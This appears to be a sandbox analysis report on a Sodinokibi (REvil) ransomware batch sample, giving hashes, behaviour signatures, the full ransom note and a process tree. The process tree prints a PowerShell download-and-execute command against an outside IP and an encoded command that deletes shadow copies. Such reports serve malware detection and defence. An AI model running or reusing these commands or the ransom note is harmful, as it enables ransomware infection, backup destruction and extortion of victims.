Overview

overview

10

Static

static

fdjnedGV.bat

windows7_x64

10

fdjnedGV.bat

windows10_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    20-03-2020 04:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fdjnedGV.bat

  • Size

    192B

  • MD5

    8f7dffa5522df79e5b33140373b3d1af

  • SHA1

    ce53fe47f145c69821fb62aded58cc7111b30354

  • SHA256

    cb8dd0fea847727d0f111df73187d8f78b67479c9225cfc7c32860a915dd5832

  • SHA512

    699adbc5eed8f93f1e6c324c96379b5ed4da00a5c72df782854f5f0281d6d7c0c2350899b93570a4316b457a96d169aa8226c5199b5adf2c101fb8c0b4321c8c

Score
10/10
evasionspywaretrojanransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/fdjnedGV

Extracted

Path

C:\5g997z561s-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5g997z561s. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DBFECC82F6AF3F5 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2DBFECC82F6AF3F5 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: bVQLaXSXcWa8RxXMIA0aIl3gSkyCijvsBK/SzoK+YaVJFVTUSR4xW0YAxcoGXbNo wujfDbAs5VBc/hX0odmfe98+3gM3QZNvND8BWF8LClb6keOVhpqdkkCB1LInIXvq pQCS25bVmRdom79LllyTgY1w3kGiiH7W6E8A2PWG+jhh6CqAQvjle1LeyUXA6Xbu sKYJZVRGe2TsVD1RiXNva2gdI2xjshqyi3jc5UnGilIk8Sm9VIT8eU5fLejGFA/S ody7mDrrIR+v+GJszxWSThccf5Ydpq9aZEvyfKY71rC+H/0/xYC9TqZTtSb1vbhX zY3nMfkJR5Y2BRJjk/d0aa882ZBzR5vuDK9Lt85rR25GLDwYwr/9F7GyqqdChdDN f1aLs1KgpEnHw/8KF1dBKvH5QmeSje3yvmpt5oXUf6nbvxkGiosHzOemvkA5Zx0s llnXPxQ/tXZ0StgmWBExcMKvovDyxP4k1Q8GLRgIeq6nSBKBOC0xBU0TiodKntRG 3iVnnIew7415sCeIek7UBdg5pdNNvVwIVuOT9nhj0Jqi7Fje/6ffhu8nS0nzspiI raGKfMELwfEBDoUAtqM5BwsrXx/VGx99BZcK6UUHicfGAKNOfzSGQTDS0yq7ue7g STi9tmn658toHwDmgxsRSkXKxN5hEr1wNlk/y6GLN9zn+3iTEnPPT2JREFaAKRh3 Kv0ZXqYwATBEWjwPPCiEGmnaSv54qpoZhIf5O8XcqjPHxg7ec25LqBGmj5ej4Tvw Fau1LR7mcsfDB4Eb2C/D85pddDGS3oJtTkgfezxQ2LNxmtIQXgD45RNwFDEBDEA3 p6r5v8Yz6KKBesit8zFz5iVwTqKj/KyP5yg6pCD0z4xSWtSxA9We/sd1aLWoRlbm E3q3BHAxKlXaLcUxi6zLuR8RHv37kmfFnMHU5ohM6fWfTfS0fKhcVk4cb4HQdwUI Ykx65E9wcpkCrUKfHie7uIHAdL3OolUP+N03Jhn1oSn6j2ZqE4vT8WbNlrRPQ8Wl mB7QwdFS9DR8+qv2UEkNzZZYBWaLx9/5aOSGXvItH19XlU86Nyc03KQzKlRN/rx5 bR/DPUhL3hu+Ks3VD446Z5N0779NxZ32eTxN2gEohJ2OYUTKFL8AaQbCUmfxo8GI 9DFIzT7ZwvF8uA6FvMnm/T3QmzJHYZYlEaGgwVV0eQJz7uwqVPdewjb/rY1waoOA lRzZ9VWINifxgVhbi3/49tLNjbQmK3mdUZj56bmv7+7Ap3F75iJUNaFHNdyn8PUT CMbcx3UXQOboFm7B2BjAzc5rAhVKPFLS33rCDEw+pFLkVcDXAkBL2g== Extension name: 5g997z561s ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DBFECC82F6AF3F5

http://decryptor.cc/2DBFECC82F6AF3F5

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Drops file in Program Files directory 19 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 134 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Drops file in System32 directory 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\fdjnedGV.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/fdjnedGV');Invoke-NBPNZEPPV;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Drops file in System32 directory
      • Discovering connected drives
      PID:1876
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Discovering connected drives
        PID:1988
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1484

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit